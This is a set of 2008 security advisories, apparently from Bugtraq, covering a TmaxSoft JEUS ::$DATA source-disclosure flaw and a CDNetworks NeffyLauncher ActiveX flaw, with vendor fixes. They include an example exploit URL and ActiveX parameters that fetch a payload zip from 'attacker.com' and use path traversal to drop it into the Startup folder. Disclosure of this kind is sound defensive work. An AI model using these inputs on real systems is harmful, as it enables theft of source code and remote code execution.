TmaxSoft JEUS Alternate Data Streams Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: TmaxSoft JEUS Alternate Data Streams Vulnerability Author: Simon Ryeo(bar4mi (at) gmail) Severity: High Impact: Remote File Disclosure Vulnerable Version: JEUS 5: Fix#26 on NTFS References: - http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx - http://www.tmaxsoft.com - http://www.tmax.co.kr/tmaxsoft/index.screen History: - 10.22.2008: Initiate notify - 10.23.2008: The vendor responded - 11.21.2008: The vendor replied detail information. - 12.12.2008: The vendor finished the preparation for patches and responses. Description: On NTFS TmaxSoft JEUS, which is an famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs(Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA. So it treated test.jsp::$DATA as an normal file when it requested. This is similar to the past MS Widnows IIS vulnerability(Bid 0149). Exploit: The attacker can obtain them easily using an URL request. http://www.target.com/foo/bar.jsp::$DATA Solution: The vendor released solutions for this problem. Method 1) Upgrade JEUS - JEUS 5: http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WASproduct Code=JeusversionCode=5.0.0.26.Pfc=downsc=down_productmid=binary - JEUS 4: a. Use to change WebtoB function b. Upgrade JEUS to version 6 (the service for version 4 will be out of service after Dec 2009) Method 2) Use to change WebtoB fuction - Change the message communication method from 'URI' to 'EXT' (This is valid whether you use the embed WebtoB to JEUS or the single WebtoB) Method 3) Install the patch (ex. jext.jar) - The patch file will be valid until Jan. 2009 (Target version: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x(each verison will be offered below Fix#26) Please refer to TmaxSoft Homepage for detail support palns. It will be valid until Mar. 2009. (http://www.tmaxsoft.com) -BEGIN PGP SIGNATURE- Version: 9.8.3.4028 wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI KY69SPNXHg2rHlXJanIBQDw= =SW3P -END PGP SIGNATURE--
Fwd: TmaxSoft JEUS Alternate Data Streams Vulnerability
Dear bugtraq, Thanks for your concern. I saw BID 32804. It is one incorrect information. Tmax Soft JEUS 5 Fix#26 is not vulnerable. The vendor informs that users upgrade to this version(Fix #26). Please change this information. Sincerely, Simon -- Forwarded message -- From: Simon Ryeo bar...@gmail.com Date: 2008/12/13 Subject: TmaxSoft JEUS Alternate Data Streams Vulnerability To: bugtraq@securityfocus.com -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: TmaxSoft JEUS Alternate Data Streams Vulnerability Author: Simon Ryeo(bar4mi (at) gmail) Severity: High Impact: Remote File Disclosure Vulnerable Version: JEUS 5: Fix#26 on NTFS References: - http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx - http://www.tmaxsoft.com - http://www.tmax.co.kr/tmaxsoft/index.screen History: - 10.22.2008: Initiate notify - 10.23.2008: The vendor responded - 11.21.2008: The vendor replied detail information. - 12.12.2008: The vendor finished the preparation for patches and responses. Description: On NTFS TmaxSoft JEUS, which is an famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs(Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA. So it treated test.jsp::$DATA as an normal file when it requested. This is similar to the past MS Widnows IIS vulnerability(Bid 0149). Exploit: The attacker can obtain them easily using an URL request. http://www.target.com/foo/bar.jsp::$DATA Solution: The vendor released solutions for this problem. Method 1) Upgrade JEUS - JEUS 5: http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WASproduct Code=JeusversionCode=5.0.0.26.Pfc=downsc=down_productmid=binary - JEUS 4: a. Use to change WebtoB function b. Upgrade JEUS to version 6 (the service for version 4 will be out of service after Dec 2009) Method 2) Use to change WebtoB fuction - Change the message communication method from 'URI' to 'EXT' (This is valid whether you use the embed WebtoB to JEUS or the single WebtoB) Method 3) Install the patch (ex. jext.jar) - The patch file will be valid until Jan. 2009 (Target version: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x(each verison will be offered below Fix#26) Please refer to TmaxSoft Homepage for detail support palns. It will be valid until Mar. 2009. (http://www.tmaxsoft.com) -BEGIN PGP SIGNATURE- Version: 9.8.3.4028 wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI KY69SPNXHg2rHlXJanIBQDw= =SW3P -END PGP SIGNATURE--
CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) Severity: High Impact: Remote Code Execution Vulnerable Systems: MS Windows Systems Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} Solution: Upgrade the vendor's patch Vendor's Homepage: http://www.cdnetworks.com Reference: How to stop an ActiveX control from running in Internet Explorer http://support.microsoft.com/kb/240797/ko http://support.microsoft.com/kb/240797/en-us History: - 02.27.2008: Initiate notify - 03.06.2008: The vendor patched - After: The vendor are applying the patch to their customers. Description: Neffycient Download is a ActiveX control used to download and to upgrade such as game install files through HTTP, FTP, etc. It has two vulnerabilities. 1st, a attacker can copy a malicious file to any path such as start program folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup). 2nd, a attacker can issue keycodes which are used to restrict execution on other domains. Object: I notify this vulnerability not to promote abnormal uses but to make a software more secure. This vulnerability was patched by the vendor's positive effort. I hope this information helps many people who try to study security and to develop an application. 1. Remote Code Execution First of all, we must have write permission on a board in a web site used this ActiveX or obtain a valid keycode which is correct to your site. An Attacker who has a valid keycode can make a expolit by modifying HttpSkin, SkinPath's values. Malicious files which is on attacker's site must be compressed as ZIP file. For instance. The below modification copies abnormal files to Windows's root directory. PARAM NAME=HttpSkin VALUE=http://www.attacker.com/maliciousFiles.zip; PARAM NAME=SkinPath VALUE=../../../../ In this way an attacker can modify SkinPath's value to All Users's Start Program Folder. Then he can execute his malicious program when the user restarts his computer. 2. Generating a KeyCode Value An attacker can make the keycode generator by debugging this ActiveX control. A keycode's value has two meaning. First two digits represent the domain's length(hexadecimal). Next five(or more) digits are valuable numbers to calculate a domain. The keycode check the procedure of this ActiveX control likes below. It calculates the keycode's value and returns four bytes as a result. Next it starts the domain's calculation and returns four bytes. Finally, it compares with these four bytes to check whether the site is valid. I made a PoC using inline assembly and C. But it doesn't open to the public because of the vendor's request. (Just refer above descriptions.) -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.7.1 (Build 1503) Charset: utf-8 wj8DBQFH+eM+zuoR/xLtCioRAhKKAJ4nkA8EGap6fZ+xvRJSNpCDlcanwQCglsYb p8LCGeXrEnMoshPDBVB4dOc= =OZDe -END PGP SIGNATURE- -BEGIN PGP PUBLIC KEY BLOCK- Version: PGP Desktop 9.7.1 (Build 1503) mQGiBD6QuAoRBADBP14ij7t8YnnD0O1PMkWzsq/SXhui0UtBl4QSdPNvogdhKm3U Vp4Pl6ABj7ROxVAabvqZPgY8qOsWIQEbcc9fqQtgMAKVWImKeC2o0fWnG4/7Ba7u elOpXzFiVdF9aBKrlwwT4YF2rem9xPhuyxcFRPV4aDNH6VdnFK/0qQSKlwCg/2tt AJk8avB1RjJK1PZWvo3ZxNkD/2+R/Ps9HlNezxyinwXb1hFPNOlXwOtjupxOt6gZ c5iaWPi8eg8Fxna80/ccxwrHWFdkNCdgcw40N65/UofjFueG7pFh6kBCnwbY1MHs bU9CsucdOyLZSDczeZmaHgQD1zcsDXq+EfFCFEMtfmZaksA5cT2NvyEWYVcBk6Dm nXaABACAJjg7+lFwzXynUuTH+v5TOM8f3Wf8u5ZA3IT4dGCTvq2p4CnkH9ZQdbrl nqoco3b3rAcAiCNJTGeRQA7VS90QvGp3sOpFebGh5Y79B0kjA2/TdAg7tkQqnlZK Yw7hMBjAucTU4hqrnkI8xSh8DmMkTGz09xoCg2ezSA4OMUXSBLQgU3VuZy1Lb28g UnllbyA8YmFyNG1pQGdtYWlsLmNvbT6JAHcEEBECADcFAkfrX1IICwkIBwMCAQoC GQEZGGxkYXA6Ly9rZXlzZXJ2ZXIucGdwLmNvbQUeAQQVCAkKAAoJEM7qEf8S 7QoqPKIAoI15i04s8OZOWfTmTkQRIvlv7zt2AJ0ZQfreA0/K4MEzRQM7cDuKpj0C FYkBIgQQAQIADAUCR+tfGAUDABJ1AAAKCRCXELibyletfNB+B/0eLgIhd/2j9/Lf FnF6O989xduaLi5pf8CPpjZOeJEWJZd+mJuopoiGV5Zn2z4Cz1yWYinqGmEij6P2 uqx2FcQngk85XZD3Gym4O4Dh6nVv9E1MutQPlIhpDHfCqlX9nR4DGmih8LsOSIRo zP9shfvQR2E2AmyD0Mt2a0np0YuUpEoUo609bZnLQqs0OmuznnqAvSlnAGNDaFxz 2pZaD6FEguu41yJAEHMbVa9zZisd42GTezjezWlg+S9CrZK8BSF4yas4LWuR1vy1 SzjRPxLxV7FBWrkisnxmg3CVSU3m+jYrVOxXRqp0aEv2s7t2fbab6Hd4MfoFzhWG gsxlBm07tCFTdW5nLUtvbyBSeWVvIDxiYXJhbWlAYWhubGFiLmNvbT6JAG8EEBEC AC8FAkfrX1IICwkIBwMCAQoZGGxkYXA6Ly9rZXlzZXJ2ZXIucGdwLmNvbQUeAQAA AAAKCRDO6hH/Eu0KKgMqAKDrVa6/ipKl2PCsSzwtxSGtQyenXACfUCE57ZiAoo6N 9xJpFH8IYhpysf20GmJhcjRtaSA8YmFyYW1pQGFobmxhYi5jb20+iQB0BBARAgA0 BQJH619SCAsJCAcDAgEKGRhsZGFwOi8va2V5c2VydmVyLnBncC5jb20FHgEE FQgJCgAKCRDO6hH/Eu0KKiE6AJ9or+APFAQ8kyZtqYuv41oEEM1tYQCg4oOw0zZ0 eyoceGTSRk38iG4CtlmJASIEEAECAAwFAkfrXxgFAwASdQAACgkQlxC4m8pXrXwb 6Af/Wb37fiSmAnhVLFd24u0fxG0IjlgwzrSHF5oMd8WHmxcnCyuO4TtwN7Itd8f5 6L/ACOWEHpwtRWUXsmH1afpEkQ/Eq1B9e4Pu/dZ0G3brv+EruPI/6o7lJQK1EVY0 psPcedSxnrrIgczBEFs6G7f1PJ5CVLEwAaYheUL8HjzhMV7hqObCkSozyI9a7Ur+ UbRfpTb1goNsJ8dqMmkdqKG5HLgq4uhPmCKNJONPFUR5kK6YnUGMMZxahUAqynsg